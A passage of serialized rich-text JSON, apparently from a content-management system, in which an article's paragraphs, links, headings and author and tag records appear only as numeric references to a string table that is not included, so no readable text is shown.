Type":173},{},[],{"data":33058,"content":33059,"nodeType":254},{},[33060],{"data":33061,"content":33062,"nodeType":178},{},[33063,33066,33072],{"data":33064,"marks":33065,"value":23973,"nodeType":173},{},[],{"data":33067,"content":33068,"nodeType":186},{"uri":1275},[33069],{"data":33070,"marks":33071,"value":23980,"nodeType":173},{},[],{"data":33073,"marks":33074,"value":1260,"nodeType":173},{},[],{"data":33076,"content":33077,"nodeType":178},{},[33078],{"data":33079,"marks":33080,"value":23990,"nodeType":173},{},[],{"data":33082,"content":33083,"nodeType":250},{},[33084,33100,33123],{"data":33085,"content":33086,"nodeType":254},{},[33087],{"data":33088,"content":33089,"nodeType":178},{},[33090,33093,33097],{"data":33091,"marks":33092,"value":24003,"nodeType":173},{},[],{"data":33094,"marks":33095,"value":24008,"nodeType":173},{},[33096],{"type":370},{"data":33098,"marks":33099,"value":24012,"nodeType":173},{},[],{"data":33101,"content":33102,"nodeType":254},{},[33103],{"data":33104,"content":33105,"nodeType":178},{},[33106,33109,33113,33116,33120],{"data":33107,"marks":33108,"value":24022,"nodeType":173},{},[],{"data":33110,"marks":33111,"value":24027,"nodeType":173},{},[33112],{"type":370},{"data":33114,"marks":33115,"value":24031,"nodeType":173},{},[],{"data":33117,"marks":33118,"value":24036,"nodeType":173},{},[33119],{"type":370},{"data":33121,"marks":33122,"value":24040,"nodeType":173},{},[],{"data":33124,"content":33125,"nodeType":254},{},[33126],{"data":33127,"content":33128,"nodeType":178},{},[33129,33132,33136],{"data":33130,"marks":33131,"value":24050,"nodeType":173},{},[],{"data":33133,"marks":33134,"value":24055,"nodeType":173},{},[33135],{"type":370},{"data":33137,"marks":33138,"value":24059,"nodeType":173},{},[],{"data":33140,"content":33143,"nodeType":312},{"target":33141},{"sys":33142},{"id":24064,"type":317,"linkType":318},[],{"data":33145,"content":33146,"nodeType":178},{},[33147],{"data":33148,"marks":33149,"value":24072,"nodeType":173},{},[],{"data":33151,"content":33152,"nodeType":178},{},[33153],{"data":33154,"marks":33155,"value":24079,"nodeType":173},{},[],{"data":33157,"content":33158,"nodeType":231},{},[],{"data":33160,"content":33161,"nodeType":169},{},[33162],{"data":33163,"marks":33164,"value":24089,"nodeType":173},{},[],{"data":33166,"content":33167,"nodeType":235},{},[33168],{"data":33169,"marks":33170,"value":24096,"nodeType":173},{},[],{"data":33172,"content":33173,"nodeType":178},{},[33174],{"data":33175,"marks":33176,"value":24103,"nodeType":173},{},[],{"data":33178,"content":33179,"nodeType":250},{},[33180,33204,33239],{"data":33181,"content":33182,"nodeType":254},{},[33183],{"data":33184,"content":33185,"nodeType":178},{},[33186,33190,33193,33201],{"data":33187,"marks":33188,"value":24117,"nodeType":173},{},[33189],{"type":370},{"data":33191,"marks":33192,"value":24121,"nodeType":173},{},[],{"data":33194,"content":33197,"nodeType":1698},{"target":33195},{"sys":33196},{"id":24126,"type":317,"linkType":318},[33198],{"data":33199,"marks":33200,"value":24131,"nodeType":173},{},[],{"data":33202,"marks":33203,"value":24135,"nodeType":173},{},[],{"data":33205,"content":33206,"nodeType":254},{},[33207],{"data":33208,"content":33209,"nodeType":178},{},[33210,33214,33217,33225,33228,33236],{"data":33211,"marks":33212,"value":24146,"nodeType":173},{},[33213],{"type":370},{"data":33215,"marks":33216,"value":24150,"nodeType":173},{},[],{"data":33218,"content":33221,"nodeType":1698},{"target":33219},{"sys":33220},{"id":24155,"type":317,"linkType":318},[33222],{"data":33223,"marks":33224,"value":8046,"nodeType":173},{},[],{"data":33226,"marks":33227,"value":24163,"nodeType":173},{},[],{"data":33229,"content":33232,"nodeType":1698},{"target":33230},{"sys":33231},{"id":24168,"type":317,"linkType":318},[33233],{"data":33234,"marks":33235,"value":24173,"nodeType":173},{},[],{"data":33237,"marks":33238,"value":2340,"nodeType":173},{},[],{"data":33240,"content":33241,"nodeType":254},{},[33242],{"data":33243,"content":33244,"nodeType":178},{},[33245,33249,33252,33260],{"data":33246,"marks":33247,"value":24187,"nodeType":173},{},[33248],{"type":370},{"data":33250,"marks":33251,"value":24191,"nodeType":173},{},[],{"data":33253,"content":33256,"nodeType":1698},{"target":33254},{"sys":33255},{"id":24196,"type":317,"linkType":318},[33257],{"data":33258,"marks":33259,"value":24201,"nodeType":173},{},[],{"data":33261,"marks":33262,"value":24205,"nodeType":173},{},[],{"data":33264,"content":33265,"nodeType":178},{},[33266,33269,33275],{"data":33267,"marks":33268,"value":24212,"nodeType":173},{},[],{"data":33270,"content":33271,"nodeType":186},{"uri":24215},[33272],{"data":33273,"marks":33274,"value":24220,"nodeType":173},{},[],{"data":33276,"marks":33277,"value":24224,"nodeType":173},{},[],{"data":33279,"content":33280,"nodeType":178},{},[33281],{"data":33282,"marks":33283,"value":24231,"nodeType":173},{},[],{"data":33285,"content":33286,"nodeType":250},{},[33287,33296,33312],{"data":33288,"content":33289,"nodeType":254},{},[33290],{"data":33291,"content":33292,"nodeType":178},{},[33293],{"data":33294,"marks":33295,"value":24244,"nodeType":173},{},[],{"data":33297,"content":33298,"nodeType":254},{},[33299],{"data":33300,"content":33301,"nodeType":178},{},[33302,33305,33309],{"data":33303,"marks":33304,"value":24254,"nodeType":173},{},[],{"data":33306,"marks":33307,"value":24259,"nodeType":173},{},[33308],{"type":1646},{"data":33310,"marks":33311,"value":24263,"nodeType":173},{},[],{"data":33313,"content":33314,"nodeType":254},{},[33315],{"data":33316,"content":33317,"nodeType":178},{},[33318],{"data":33319,"marks":33320,"value":24273,"nodeType":173},{},[],{"data":33322,"content":33323,"nodeType":178},{},[33324],{"data":33325,"marks":33326,"value":24280,"nodeType":173},{},[],{"data":33328,"content":33329,"nodeType":235},{},[33330],{"data":33331,"marks":33332,"value":24287,"nodeType":173},{},[],{"data":33334,"content":33335,"nodeType":178},{},[33336],{"data":33337,"marks":33338,"value":24294,"nodeType":173},{},[],{"data":33340,"content":33341,"nodeType":250},{},[33342,33351,33360],{"data":33343,"content":33344,"nodeType":254},{},[33345],{"data":33346,"content":33347,"nodeType":178},{},[33348],{"data":33349,"marks":33350,"value":24307,"nodeType":173},{},[],{"data":33352,"content":33353,"nodeType":254},{},[33354],{"data":33355,"content":33356,"nodeType":178},{},[33357],{"data":33358,"marks":33359,"value":24317,"nodeType":173},{},[],{"data":33361,"content":33362,"nodeType":254},{},[33363],{"data":33364,"content":33365,"nodeType":178},{},[33366],{"data":33367,"marks":33368,"value":24327,"nodeType":173},{},[],{"data":33370,"content":33373,"nodeType":312},{"target":33371},{"sys":33372},{"id":24332,"type":317,"linkType":318},[],{"data":33375,"content":33376,"nodeType":178},{},[33377,33380,33384,33387,33391,33394,33398],{"data":33378,"marks":33379,"value":24340,"nodeType":173},{},[],{"data":33381,"marks":33382,"value":24345,"nodeType":173},{},[33383],{"type":370},{"data":33385,"marks":33386,"value":2936,"nodeType":173},{},[],{"data":33388,"marks":33389,"value":24353,"nodeType":173},{},[33390],{"type":370},{"data":33392,"marks":33393,"value":9534,"nodeType":173},{},[],{"data":33395,"marks":33396,"value":18640,"nodeType":173},{},[33397],{"type":370},{"data":33399,"marks":33400,"value":24364,"nodeType":173},{},[],{"data":33402,"content":33405,"nodeType":312},{"target":33403},{"sys":33404},{"id":18898,"type":317,"linkType":318},[],{"data":33407,"content":33408,"nodeType":178},{},[33409],{"data":33410,"marks":33411,"value":24376,"nodeType":173},{},[],{"data":33413,"content":33414,"nodeType":178},{},[33415],{"data":33416,"marks":33417,"value":24383,"nodeType":173},{},[],{"data":33419,"content":33420,"nodeType":250},{},[33421,33430,33439],{"data":33422,"content":33423,"nodeType":254},{},[33424],{"data":33425,"content":33426,"nodeType":178},{},[33427],{"data":33428,"marks":33429,"value":24396,"nodeType":173},{},[],{"data":33431,"content":33432,"nodeType":254},{},[33433],{"data":33434,"content":33435,"nodeType":178},{},[33436],{"data":33437,"marks":33438,"value":24406,"nodeType":173},{},[],{"data":33440,"content":33441,"nodeType":254},{},[33442],{"data":33443,"content":33444,"nodeType":178},{},[33445],{"data":33446,"marks":33447,"value":24416,"nodeType":173},{},[],{"data":33449,"content":33450,"nodeType":178},{},[33451,33454,33462],{"data":33452,"marks":33453,"value":24423,"nodeType":173},{},[],{"data":33455,"content":33458,"nodeType":1698},{"target":33456},{"sys":33457},{"id":24428,"type":317,"linkType":318},[33459],{"data":33460,"marks":33461,"value":24433,"nodeType":173},{},[],{"data":33463,"marks":33464,"value":1477,"nodeType":173},{},[],{"data":33466,"content":33467,"nodeType":231},{},[],{"data":33469,"content":33470,"nodeType":169},{},[33471],{"data":33472,"marks":33473,"value":24446,"nodeType":173},{},[],{"data":33475,"content":33476,"nodeType":235},{},[33477],{"data":33478,"marks":33479,"value":24096,"nodeType":173},{},[],{"data":33481,"content":33482,"nodeType":178},{},[33483,33486,33492,33495,33501],{"data":33484,"marks":33485,"value":24459,"nodeType":173},{},[],{"data":33487,"content":33488,"nodeType":186},{"uri":21131},[33489],{"data":33490,"marks":33491,"value":24466,"nodeType":173},{},[],{"data":33493,"marks":33494,"value":24470,"nodeType":173},{},[],{"data":33496,"content":33497,"nodeType":186},{"uri":21144},[33498],{"data":33499,"marks":33500,"value":24477,"nodeType":173},{},[],{"data":33502,"marks":33503,"value":24481,"nodeType":173},{},[],{"data":33505,"content":33506,"nodeType":178},{},[33507],{"data":33508,"marks":33509,"value":24488,"nodeType":173},{},[],{"data":33511,"content":33512,"nodeType":178},{},[33513],{"data":33514,"marks":33515,"value":24495,"nodeType":173},{},[],{"data":33517,"content":33518,"nodeType":178},{},[33519],{"data":33520,"marks":33521,"value":24502,"nodeType":173},{},[],{"data":33523,"content":33524,"nodeType":235},{},[33525],{"data":33526,"marks":33527,"value":24287,"nodeType":173},{},[],{"data":33529,"content":33530,"nodeType":178},{},[33531],{"data":33532,"marks":33533,"value":24515,"nodeType":173},{},[],{"data":33535,"content":33538,"nodeType":312},{"target":33536},{"sys":33537},{"id":24520,"type":317,"linkType":318},[],{"data":33540,"content":33541,"nodeType":178},{},[33542,33545,33549],{"data":33543,"marks":33544,"value":24528,"nodeType":173},{},[],{"data":33546,"marks":33547,"value":18640,"nodeType":173},{},[33548],{"type":370},{"data":33550,"marks":33551,"value":24536,"nodeType":173},{},[],{"data":33553,"content":33554,"nodeType":250},{},[33555,33564,33573,33582],{"data":33556,"content":33557,"nodeType":254},{},[33558],{"data":33559,"content":33560,"nodeType":178},{},[33561],{"data":33562,"marks":33563,"value":24549,"nodeType":173},{},[],{"data":33565,"content":33566,"nodeType":254},{},[33567],{"data":33568,"content":33569,"nodeType":178},{},[33570],{"data":33571,"marks":33572,"value":24559,"nodeType":173},{},[],{"data":33574,"content":33575,"nodeType":254},{},[33576],{"data":33577,"content":33578,"nodeType":178},{},[33579],{"data":33580,"marks":33581,"value":24569,"nodeType":173},{},[],{"data":33583,"content":33584,"nodeType":254},{},[33585],{"data":33586,"content":33587,"nodeType":178},{},[33588],{"data":33589,"marks":33590,"value":24579,"nodeType":173},{},[],{"data":33592,"content":33595,"nodeType":312},{"target":33593},{"sys":33594},{"id":21021,"type":317,"linkType":318},[],{"data":33597,"content":33598,"nodeType":178},{},[33599,33602,33610],{"data":33600,"marks":33601,"value":24591,"nodeType":173},{},[],{"data":33603,"content":33606,"nodeType":1698},{"target":33604},{"sys":33605},{"id":2215,"type":317,"linkType":318},[33607],{"data":33608,"marks":33609,"value":24600,"nodeType":173},{},[],{"data":33611,"marks":33612,"value":1477,"nodeType":173},{},[],{"data":33614,"content":33615,"nodeType":231},{},[],{"data":33617,"content":33618,"nodeType":169},{},[33619],{"data":33620,"marks":33621,"value":24613,"nodeType":173},{},[],{"data":33623,"content":33624,"nodeType":235},{},[33625],{"data":33626,"marks":33627,"value":24096,"nodeType":173},{},[],{"data":33629,"content":33630,"nodeType":178},{},[33631,33634,33642],{"data":33632,"marks":33633,"value":24626,"nodeType":173},{},[],{"data":33635,"content":33638,"nodeType":1698},{"target":33636},{"sys":33637},{"id":24631,"type":317,"linkType":318},[33639],{"data":33640,"marks":33641,"value":24636,"nodeType":173},{},[],{"data":33643,"marks":33644,"value":2340,"nodeType":173},{},[],{"data":33646,"content":33647,"nodeType":178},{},[33648],{"data":33649,"marks":33650,"value":24646,"nodeType":173},{},[],{"data":33652,"content":33653,"nodeType":178},{},[33654,33657,33665,33668,33674],{"data":33655,"marks":33656,"value":24653,"nodeType":173},{},[],{"data":33658,"content":33661,"nodeType":1698},{"target":33659},{"sys":33660},{"id":519,"type":317,"linkType":318},[33662],{"data":33663,"marks":33664,"value":6811,"nodeType":173},{},[],{"data":33666,"marks":33667,"value":24665,"nodeType":173},{},[],{"data":33669,"content":33670,"nodeType":186},{"uri":832},[33671],{"data":33672,"marks":33673,"value":835,"nodeType":173},{},[],{"data":33675,"marks":33676,"value":24675,"nodeType":173},{},[],{"data":33678,"content":33679,"nodeType":178},{},[33680,33683,33691],{"data":33681,"marks":33682,"value":24682,"nodeType":173},{},[],{"data":33684,"content":33687,"nodeType":1698},{"target":33685},{"sys":33686},{"id":3979,"type":317,"linkType":318},[33688],{"data":33689,"marks":33690,"value":24691,"nodeType":173},{},[],{"data":33692,"marks":33693,"value":24695,"nodeType":173},{},[],{"data":33695,"content":33696,"nodeType":235},{},[33697],{"data":33698,"marks":33699,"value":24287,"nodeType":173},{},[],{"data":33701,"content":33702,"nodeType":178},{},[33703,33706,33714],{"data":33704,"marks":33705,"value":24708,"nodeType":173},{},[],{"data":33707,"content":33710,"nodeType":1698},{"target":33708},{"sys":33709},{"id":24713,"type":317,"linkType":318},[33711],{"data":33712,"marks":33713,"value":24718,"nodeType":173},{},[],{"data":33715,"marks":33716,"value":24722,"nodeType":173},{},[],{"data":33718,"content":33719,"nodeType":178},{},[33720],{"data":33721,"marks":33722,"value":24729,"nodeType":173},{},[],{"data":33724,"content":33725,"nodeType":178},{},[33726],{"data":33727,"marks":33728,"value":24736,"nodeType":173},{},[],{"data":33730,"content":33731,"nodeType":250},{},[33732,33756],{"data":33733,"content":33734,"nodeType":254},{},[33735],{"data":33736,"content":33737,"nodeType":178},{},[33738,33742,33745,33753],{"data":33739,"marks":33740,"value":24750,"nodeType":173},{},[33741],{"type":370},{"data":33743,"marks":33744,"value":24754,"nodeType":173},{},[],{"data":33746,"content":33749,"nodeType":1698},{"target":33747},{"sys":33748},{"id":24759,"type":317,"linkType":318},[33750],{"data":33751,"marks":33752,"value":24764,"nodeType":173},{},[],{"data":33754,"marks":33755,"value":24768,"nodeType":173},{},[],{"data":33757,"content":33758,"nodeType":254},{},[33759],{"data":33760,"content":33761,"nodeType":178},{},[33762,33766,33769,33777],{"data":33763,"marks":33764,"value":24779,"nodeType":173},{},[33765],{"type":370},{"data":33767,"marks":33768,"value":24754,"nodeType":173},{},[],{"data":33770,"content":33773,"nodeType":1698},{"target":33771},{"sys":33772},{"id":24787,"type":317,"linkType":318},[33774],{"data":33775,"marks":33776,"value":24792,"nodeType":173},{},[],{"data":33778,"marks":33779,"value":24796,"nodeType":173},{},[],{"data":33781,"content":33782,"nodeType":178},{},[33783],{"data":33784,"marks":33785,"value":24803,"nodeType":173},{},[],{"data":33787,"content":33790,"nodeType":312},{"target":33788},{"sys":33789},{"id":24808,"type":317,"linkType":318},[],{"data":33792,"content":33793,"nodeType":178},{},[33794,33797,33801],{"data":33795,"marks":33796,"value":24816,"nodeType":173},{},[],{"data":33798,"marks":33799,"value":2600,"nodeType":173},{},[33800],{"type":370},{"data":33802,"marks":33803,"value":1477,"nodeType":173},{},[],{"data":33805,"content":33806,"nodeType":178},{},[33807,33810,33814],{"data":33808,"marks":33809,"value":5039,"nodeType":173},{},[],{"data":33811,"marks":33812,"value":2600,"nodeType":173},{},[33813],{"type":370},{"data":33815,"marks":33816,"value":24837,"nodeType":173},{},[],{"data":33818,"content":33819,"nodeType":178},{},[33820,33823,33831],{"data":33821,"marks":33822,"value":24844,"nodeType":173},{},[],{"data":33824,"content":33827,"nodeType":1698},{"target":33825},{"sys":33826},{"id":2405,"type":317,"linkType":318},[33828],{"data":33829,"marks":33830,"value":24853,"nodeType":173},{},[],{"data":33832,"marks":33833,"value":24857,"nodeType":173},{},[],{"data":33835,"content":33838,"nodeType":312},{"target":33836},{"sys":33837},{"id":24862,"type":317,"linkType":318},[],{"data":33840,"content":33841,"nodeType":178},{},[33842,33845,33853],{"data":33843,"marks":33844,"value":24870,"nodeType":173},{},[],{"data":33846,"content":33849,"nodeType":1698},{"target":33847},{"sys":33848},{"id":24875,"type":317,"linkType":318},[33850],{"data":33851,"marks":33852,"value":24880,"nodeType":173},{},[],{"data":33854,"marks":33855,"value":24884,"nodeType":173},{},[],{"data":33857,"content":33858,"nodeType":178},{},[33859],{"data":33860,"marks":33861,"value":24891,"nodeType":173},{},[],{"data":33863,"content":33864,"nodeType":231},{},[],{"data":33866,"content":33867,"nodeType":169},{},[33868],{"data":33869,"marks":33870,"value":24901,"nodeType":173},{},[],{"data":33872,"content":33873,"nodeType":235},{},[33874],{"data":33875,"marks":33876,"value":24096,"nodeType":173},{},[],{"data":33878,"content":33879,"nodeType":178},{},[33880],{"data":33881,"marks":33882,"value":24914,"nodeType":173},{},[],{"data":33884,"content":33885,"nodeType":178},{},[33886],{"data":33887,"marks":33888,"value":24921,"nodeType":173},{},[],{"data":33890,"content":33891,"nodeType":178},{},[33892,33895,33903],{"data":33893,"marks":33894,"value":24928,"nodeType":173},{},[],{"data":33896,"content":33899,"nodeType":1698},{"target":33897},{"sys":33898},{"id":24933,"type":317,"linkType":318},[33900],{"data":33901,"marks":33902,"value":24938,"nodeType":173},{},[],{"data":33904,"marks":33905,"value":24942,"nodeType":173},{},[],{"data":33907,"content":33908,"nodeType":235},{},[33909],{"data":33910,"marks":33911,"value":24287,"nodeType":173},{},[],{"data":33913,"content":33914,"nodeType":178},{},[33915,33918,33926],{"data":33916,"marks":33917,"value":24955,"nodeType":173},{},[],{"data":33919,"content":33922,"nodeType":1698},{"target":33920},{"sys":33921},{"id":2489,"type":317,"linkType":318},[33923],{"data":33924,"marks":33925,"value":24964,"nodeType":173},{},[],{"data":33927,"marks":33928,"value":24968,"nodeType":173},{},[],{"data":33930,"content":33933,"nodeType":312},{"target":33931},{"sys":33932},{"id":18589,"type":317,"linkType":318},[],{"data":33935,"content":33936,"nodeType":178},{},[33937],{"data":33938,"marks":33939,"value":24980,"nodeType":173},{},[],{"data":33941,"content":33942,"nodeType":250},{},[33943,33952,33961],{"data":33944,"content":33945,"nodeType":254},{},[33946],{"data":33947,"content":33948,"nodeType":178},{},[33949],{"data":33950,"marks":33951,"value":24993,"nodeType":173},{},[],{"data":33953,"content":33954,"nodeType":254},{},[33955],{"data":33956,"content":33957,"nodeType":178},{},[33958],{"data":33959,"marks":33960,"value":25003,"nodeType":173},{},[],{"data":33962,"content":33963,"nodeType":254},{},[33964],{"data":33965,"content":33966,"nodeType":178},{},[33967],{"data":33968,"marks":33969,"value":25013,"nodeType":173},{},[],{"data":33971,"content":33972,"nodeType":178},{},[33973,33976,33984],{"data":33974,"marks":33975,"value":25020,"nodeType":173},{},[],{"data":33977,"content":33980,"nodeType":1698},{"target":33978},{"sys":33979},{"id":2489,"type":317,"linkType":318},[33981],{"data":33982,"marks":33983,"value":24600,"nodeType":173},{},[],{"data":33985,"marks":33986,"value":1477,"nodeType":173},{},[],{"data":33988,"content":33989,"nodeType":231},{},[],{"data":33991,"content":33992,"nodeType":169},{},[33993],{"data":33994,"marks":33995,"value":25041,"nodeType":173},{},[],{"data":33997,"content":33998,"nodeType":235},{},[33999],{"data":34000,"marks":34001,"value":24096,"nodeType":173},{},[],{"data":34003,"content":34004,"nodeType":178},{},[34005],{"data":34006,"marks":34007,"value":25054,"nodeType":173},{},[],{"data":34009,"content":34010,"nodeType":178},{},[34011,34014,34022],{"data":34012,"marks":34013,"value":25061,"nodeType":173},{},[],{"data":34015,"content":34018,"nodeType":1698},{"target":34016},{"sys":34017},{"id":25066,"type":317,"linkType":318},[34019],{"data":34020,"marks":34021,"value":25071,"nodeType":173},{},[],{"data":34023,"marks":34024,"value":25075,"nodeType":173},{},[],{"data":34026,"content":34027,"nodeType":235},{},[34028],{"data":34029,"marks":34030,"value":24287,"nodeType":173},{},[],{"data":34032,"content":34033,"nodeType":178},{},[34034,34037,34041],{"data":34035,"marks":34036,"value":25088,"nodeType":173},{},[],{"data":34038,"marks":34039,"value":25093,"nodeType":173},{},[34040],{"type":370},{"data":34042,"marks":34043,"value":1477,"nodeType":173},{},[],{"data":34045,"content":34048,"nodeType":312},{"target":34046},{"sys":34047},{"id":25101,"type":317,"linkType":318},[],{"data":34050,"content":34051,"nodeType":178},{},[34052],{"data":34053,"marks":34054,"value":25109,"nodeType":173},{},[],{"data":34056,"content":34057,"nodeType":178},{},[34058],{"data":34059,"marks":34060,"value":25116,"nodeType":173},{},[],{"data":34062,"content":34063,"nodeType":178},{},[34064,34067,34075],{"data":34065,"marks":34066,"value":25123,"nodeType":173},{},[],{"data":34068,"content":34071,"nodeType":1698},{"target":34069},{"sys":34070},{"id":25128,"type":317,"linkType":318},[34072],{"data":34073,"marks":34074,"value":24433,"nodeType":173},{},[],{"data":34076,"marks":34077,"value":1477,"nodeType":173},{},[],{"data":34079,"content":34080,"nodeType":231},{},[],{"data":34082,"content":34083,"nodeType":169},{},[34084],{"data":34085,"marks":34086,"value":2824,"nodeType":173},{},[],{"data":34088,"content":34089,"nodeType":178},{},[34090],{"data":34091,"marks":34092,"value":25151,"nodeType":173},{},[],{"data":34094,"content":34095,"nodeType":178},{},[34096],{"data":34097,"marks":34098,"value":25158,"nodeType":173},{},[],{"data":34100,"content":34101,"nodeType":178},{},[34102,34105,34111,34114,34120],{"data":34103,"marks":34104,"value":25165,"nodeType":173},{},[],{"data":34106,"content":34107,"nodeType":186},{"uri":2862},[34108],{"data":34109,"marks":34110,"value":2865,"nodeType":173},{},[],{"data":34112,"marks":34113,"value":25175,"nodeType":173},{},[],{"data":34115,"content":34116,"nodeType":186},{"uri":2886},[34117],{"data":34118,"marks":34119,"value":2889,"nodeType":173},{},[],{"data":34121,"marks":34122,"value":1477,"nodeType":173},{},[],{"items":34124},[34125,34127],{"sys":34126,"name":509},{"id":508},{"sys":34128,"name":505},{"id":504},{"items":34130},[34131],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":34132},{"url":2911},{"__typename":1528,"sys":34134,"content":34135,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":34951,"authorsCollection":34957},{"id":519},{"json":34136},{"nodeType":165,"data":34137,"content":34138},{},[34139,34145,34151,34157,34160,34167,34173,34179,34184,34190,34195,34211,34217,34227,34230,34237,34243,34256,34262,34272,34277,34280,34287,34294,34299,34307,34323,34331,34337,34345,34360,34368,34374,34382,34408,34416,34422,34430,34446,34451,34459,34465,34473,34506,34509,34516,34524,34540,34548,34554,34562,34588,34593,34601,34607,34612,34615,34622,34630,34636,34687,34692,34695,34702,34710,34716,34721,34724,34731,34737,34743,34803,34809,34864,34870,34873,34880,34886,34892,34897,34900,34907,34913,34919,34925],{"nodeType":178,"data":34140,"content":34141},{},[34142],{"nodeType":173,"value":528,"marks":34143,"data":34144},[],{},{"nodeType":178,"data":34146,"content":34147},{},[34148],{"nodeType":173,"value":535,"marks":34149,"data":34150},[],{},{"nodeType":178,"data":34152,"content":34153},{},[34154],{"nodeType":173,"value":542,"marks":34155,"data":34156},[],{},{"nodeType":231,"data":34158,"content":34159},{},[],{"nodeType":169,"data":34161,"content":34162},{},[34163],{"nodeType":173,"value":552,"marks":34164,"data":34166},[34165],{"type":370},{},{"nodeType":178,"data":34168,"content":34169},{},[34170],{"nodeType":173,"value":560,"marks":34171,"data":34172},[],{},{"nodeType":178,"data":34174,"content":34175},{},[34176],{"nodeType":173,"value":567,"marks":34177,"data":34178},[],{},{"nodeType":312,"data":34180,"content":34183},{"target":34181},{"sys":34182},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":34185,"content":34186},{},[34187],{"nodeType":173,"value":580,"marks":34188,"data":34189},[],{},{"nodeType":312,"data":34191,"content":34194},{"target":34192},{"sys":34193},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":34196,"content":34197},{},[34198,34201,34208],{"nodeType":173,"value":593,"marks":34199,"data":34200},[],{},{"nodeType":186,"data":34202,"content":34203},{"uri":598},[34204],{"nodeType":173,"value":601,"marks":34205,"data":34207},[34206],{"type":194},{},{"nodeType":173,"value":606,"marks":34209,"data":34210},[],{},{"nodeType":178,"data":34212,"content":34213},{},[34214],{"nodeType":173,"value":613,"marks":34215,"data":34216},[],{},{"nodeType":178,"data":34218,"content":34219},{},[34220,34223],{"nodeType":173,"value":620,"marks":34221,"data":34222},[],{},{"nodeType":173,"value":624,"marks":34224,"data":34226},[34225],{"type":370},{},{"nodeType":231,"data":34228,"content":34229},{},[],{"nodeType":169,"data":34231,"content":34232},{},[34233],{"nodeType":173,"value":635,"marks":34234,"data":34236},[34235],{"type":370},{},{"nodeType":178,"data":34238,"content":34239},{},[34240],{"nodeType":173,"value":643,"marks":34241,"data":34242},[],{},{"nodeType":178,"data":34244,"content":34245},{},[34246,34249,34253],{"nodeType":173,"value":650,"marks":34247,"data":34248},[],{},{"nodeType":173,"value":654,"marks":34250,"data":34252},[34251],{"type":370},{},{"nodeType":173,"value":659,"marks":34254,"data":34255},[],{},{"nodeType":178,"data":34257,"content":34258},{},[34259],{"nodeType":173,"value":666,"marks":34260,"data":34261},[],{},{"nodeType":178,"data":34263,"content":34264},{},[34265,34268],{"nodeType":173,"value":673,"marks":34266,"data":34267},[],{},{"nodeType":173,"value":677,"marks":34269,"data":34271},[34270],{"type":370},{},{"nodeType":312,"data":34273,"content":34276},{"target":34274},{"sys":34275},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":34278,"content":34279},{},[],{"nodeType":169,"data":34281,"content":34282},{},[34283],{"nodeType":173,"value":694,"marks":34284,"data":34286},[34285],{"type":370},{},{"nodeType":235,"data":34288,"content":34289},{},[34290],{"nodeType":173,"value":702,"marks":34291,"data":34293},[34292],{"type":370},{},{"nodeType":312,"data":34295,"content":34298},{"target":34296},{"sys":34297},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":34300,"content":34301},{},[34302],{"nodeType":173,"value":716,"marks":34303,"data":34306},[34304,34305],{"type":370},{"type":194},{},{"nodeType":178,"data":34308,"content":34309},{},[34310,34313,34320],{"nodeType":173,"value":725,"marks":34311,"data":34312},[],{},{"nodeType":186,"data":34314,"content":34315},{"uri":730},[34316],{"nodeType":173,"value":733,"marks":34317,"data":34319},[34318],{"type":194},{},{"nodeType":173,"value":738,"marks":34321,"data":34322},[],{},{"nodeType":178,"data":34324,"content":34325},{},[34326],{"nodeType":173,"value":745,"marks":34327,"data":34330},[34328,34329],{"type":370},{"type":194},{},{"nodeType":178,"data":34332,"content":34333},{},[34334],{"nodeType":173,"value":754,"marks":34335,"data":34336},[],{},{"nodeType":178,"data":34338,"content":34339},{},[34340],{"nodeType":173,"value":761,"marks":34341,"data":34344},[34342,34343],{"type":370},{"type":194},{},{"nodeType":178,"data":34346,"content":34347},{},[34348,34351,34357],{"nodeType":173,"value":770,"marks":34349,"data":34350},[],{},{"nodeType":186,"data":34352,"content":34353},{"uri":775},[34354],{"nodeType":173,"value":778,"marks":34355,"data":34356},[],{},{"nodeType":173,"value":782,"marks":34358,"data":34359},[],{},{"nodeType":178,"data":34361,"content":34362},{},[34363],{"nodeType":173,"value":789,"marks":34364,"data":34367},[34365,34366],{"type":370},{"type":194},{},{"nodeType":178,"data":34369,"content":34370},{},[34371],{"nodeType":173,"value":798,"marks":34372,"data":34373},[],{},{"nodeType":178,"data":34375,"content":34376},{},[34377],{"nodeType":173,"value":805,"marks":34378,"data":34381},[34379,34380],{"type":370},{"type":194},{},{"nodeType":178,"data":34383,"content":34384},{},[34385,34388,34395,34398,34405],{"nodeType":173,"value":814,"marks":34386,"data":34387},[],{},{"nodeType":186,"data":34389,"content":34390},{"uri":819},[34391],{"nodeType":173,"value":822,"marks":34392,"data":34394},[34393],{"type":194},{},{"nodeType":173,"value":827,"marks":34396,"data":34397},[],{},{"nodeType":186,"data":34399,"content":34400},{"uri":832},[34401],{"nodeType":173,"value":835,"marks":34402,"data":34404},[34403],{"type":194},{},{"nodeType":173,"value":840,"marks":34406,"data":34407},[],{},{"nodeType":178,"data":34409,"content":34410},{},[34411],{"nodeType":173,"value":847,"marks":34412,"data":34415},[34413,34414],{"type":370},{"type":194},{},{"nodeType":178,"data":34417,"content":34418},{},[34419],{"nodeType":173,"value":856,"marks":34420,"data":34421},[],{},{"nodeType":178,"data":34423,"content":34424},{},[34425],{"nodeType":173,"value":863,"marks":34426,"data":34429},[34427,34428],{"type":370},{"type":194},{},{"nodeType":178,"data":34431,"content":34432},{},[34433,34436,34443],{"nodeType":173,"value":872,"marks":34434,"data":34435},[],{},{"nodeType":186,"data":34437,"content":34438},{"uri":832},[34439],{"nodeType":173,"value":835,"marks":34440,"data":34442},[34441],{"type":194},{},{"nodeType":173,"value":883,"marks":34444,"data":34445},[],{},{"nodeType":312,"data":34447,"content":34450},{"target":34448},{"sys":34449},{"id":890,"type":317,"linkType":318},[],{"nodeType":178,"data":34452,"content":34453},{},[34454],{"nodeType":173,"value":896,"marks":34455,"data":34458},[34456,34457],{"type":370},{"type":194},{},{"nodeType":178,"data":34460,"content":34461},{},[34462],{"nodeType":173,"value":905,"marks":34463,"data":34464},[],{},{"nodeType":178,"data":34466,"content":34467},{},[34468],{"nodeType":173,"value":912,"marks":34469,"data":34472},[34470,34471],{"type":370},{"type":194},{},{"nodeType":178,"data":34474,"content":34475},{},[34476,34479,34485,34488,34494,34497,34503],{"nodeType":173,"value":921,"marks":